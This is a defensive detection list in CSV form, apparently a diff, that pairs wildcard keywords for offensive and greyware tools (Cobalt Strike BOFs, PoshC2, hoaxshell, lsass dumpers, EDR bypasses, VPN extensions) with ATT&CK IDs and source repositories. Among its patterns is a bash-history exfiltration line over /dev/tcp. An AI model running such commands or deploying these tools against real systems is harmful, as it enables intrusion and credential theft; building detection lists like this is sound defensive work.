+"*Hidden.Desktop.mp4*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HiddenDesktop * *","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HiddenDesktop.*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HiddenDesktop.x64.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HiddenDesktop.x86.bin*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*HiddenDesktop.zip*","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","1","N/A","10","10","926","147","2023-05-25T21:27:20Z","2023-05-21T00:57:43Z"
+"*hide-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z"
+"*HideProcess*","offensive_tool_keyword","HideProcess","process injection rootkit","T1055 - T1055.012 - T1055.013 - T1055.015 - T1055.017","TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/landhb/HideProcess","1","1","N/A","N/A","5","499","111","2019-03-26T03:35:57Z","2017-03-07T01:30:15Z"
+"*higioemojdadgdbhbbbkfbebbdlfjbip*","greyware_tool_keyword","Unlimited VPN & Proxy by ibVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*HIJACK_DLL_PATH*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - 
T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","0","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z"
+"*hijack_hunter *","offensive_tool_keyword","cobaltstrike","DLL Hijack Search Order Enumeration BOF","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF","1","0","N/A","10","10","125","21","2021-11-03T17:39:32Z","2021-11-02T03:47:31Z"
+"*hijack_remote_thread*","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","1","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z"
+"*hijackablepath.c*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z"
+"*hijackablepath.o*","offensive_tool_keyword","PrivKit","PrivKit is a simple beacon object file that detects privilege escalation vulnerabilities caused by misconfigurations on Windows OS.","T1548.002 - T1059.003 - T1027.002","TA0005","N/A","N/A","Privilege Escalation","https://github.com/mertdas/PrivKit","1","0","N/A","9","3","265","35","2023-03-23T09:50:09Z","2023-03-20T04:19:40Z" 
+"*hijackCLSIDpersistence.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z"
+"*hijackDll*WINMM.dll*","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*Hijacker*","offensive_tool_keyword","Hijacker","Hijacker is a Graphical User Interface for the penetration testing tools Aircrack-ng. Airodump-ng. MDK3 and Reaver. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.This application requires an ARM android device with an internal wireless adapter that supports Monitor Mode. A few android devices do. but none of them natively. 
This means that you will need a custom firmware. Any device that uses the BCM4339 chipset (MSM8974. such as Nexus 5. Xperia Z1/Z2. LG G2. LG G Flex. Samsung Galaxy Note 3) will work with Nexmon (which also supports some other chipsets). Devices that use BCM4330 can use bcmon.","T1135 - T1175 - T1179 - T1189 - T1202","TA0002 - TA0007 - - TA0043","N/A","N/A","Network Exploitation tools","https://github.com/chrisk44/Hijacker","1","0","N/A","N/A","10","2213","435","2020-08-26T19:01:31Z","2016-11-25T01:39:07Z"
+"*HijackHunter.csproj*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*HijackHunter.exe*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","1","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*hijackProgDirMissingDll*","offensive_tool_keyword","HijackHunter","Parses a target's PE header in order to find lined DLLs vulnerable to hijacking. 
Provides reasoning and abuse techniques for each detected hijack opportunity","T1574.002 - T1059.003 - T1078.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/HijackHunter","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z"
+"*HInvokeHashGen.cs*","offensive_tool_keyword","NixImports","A .NET malware loader using API-Hashing to evade static analysis","T1055.012 - T1562.001 - T1140","TA0005 - TA0003 - TA0040","N/A","N/A","Defense Evasion - Execution","https://github.com/dr4k0nia/NixImports","1","1","N/A","N/A","2","178","23","2023-05-30T14:14:21Z","2023-05-22T18:32:01Z"
+"*hipncndjamdcmphkgngojegjblibadbe*","greyware_tool_keyword","RusVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*history -a* tail -n1 ~/.bash_history > /dev/tcp/*/*","greyware_tool_keyword","bash keylogger","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Exploitation tools","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*history -c*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense 
Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z"
+"*history -d -2 && history -d -1*","greyware_tool_keyword","history","Removes the most recently logged command.","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
+"*history_cmd","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"*HiveJack-Console.exe*","offensive_tool_keyword","cobaltstrike","Erebus CobaltStrike post penetration testing plugin","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 
Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DeEpinGh0st/Erebus","1","1","N/A","10","10","1356","214","2021-10-28T06:20:51Z","2019-09-26T09:32:00Z"
+"*hktalent/scan4all*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","1","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z"
+"*HKTL*","signature_keyword","Antivirus Signature","Antivirus signature_keyword for hacktool","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","hacktool signatures","N/A","N/A","N/A","N/A","N/A","N/A"
+"*HKTL_NETCAT*","signature_keyword","Antivirus Signature","Antiviurs signature_keyword","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*hlldz/dazzleUP*","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","9","5","479","70","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z"
+"*hlldz/Phant0m*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z"
+"*hlldz/RefleXXion*","offensive_tool_keyword","RefleXXion","RefleXXion is a utility 
designed to aid in bypassing user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","471","96","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z"
+"*hnmpcagpplmpfojmgmnngilcnanddlhb*","greyware_tool_keyword","Windscribe","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*hoangprod/AndrewSpecial*","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","1","N/A","10","4","370","101","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z"
+"*hoapmlpnmpaehilehggglehfdlnoegck*","greyware_tool_keyword","Tunnello VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*hoaxshell.py*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z"
+"*holehe *@gmail.com*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe.core:main*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe\holehe*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","0","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*holehe-master.*","offensive_tool_keyword","holehe","holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.","T1598.004 - T1592.002 - T1598.001","TA0003 - TA0009","N/A","N/A","Reconnaissance","https://github.com/megadose/holehe","1","1","N/A","6","10","5662","655","2023-09-15T21:14:10Z","2020-06-25T23:03:02Z"
+"*hollow *.exe 
*.bin*","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","235","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z"
+"*hollower.Hollow(*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*home/kali/Downloads*","offensive_tool_keyword","kali","Kali Linux usage with wsl - example: \system32\wsl.exe -d kali-linux /usr/sbin/adduser???","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*Honey hash*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*hookedbrowsers.rb*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z"
+"*hook-infection_monkey.exploit.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.network.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.post_breach.actions.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.post_breach.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.ransomware.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-infection_monkey.system_info.collectors.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 
T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z"
+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","hook script for lsassy from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
+"*hook-lsassy.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z"
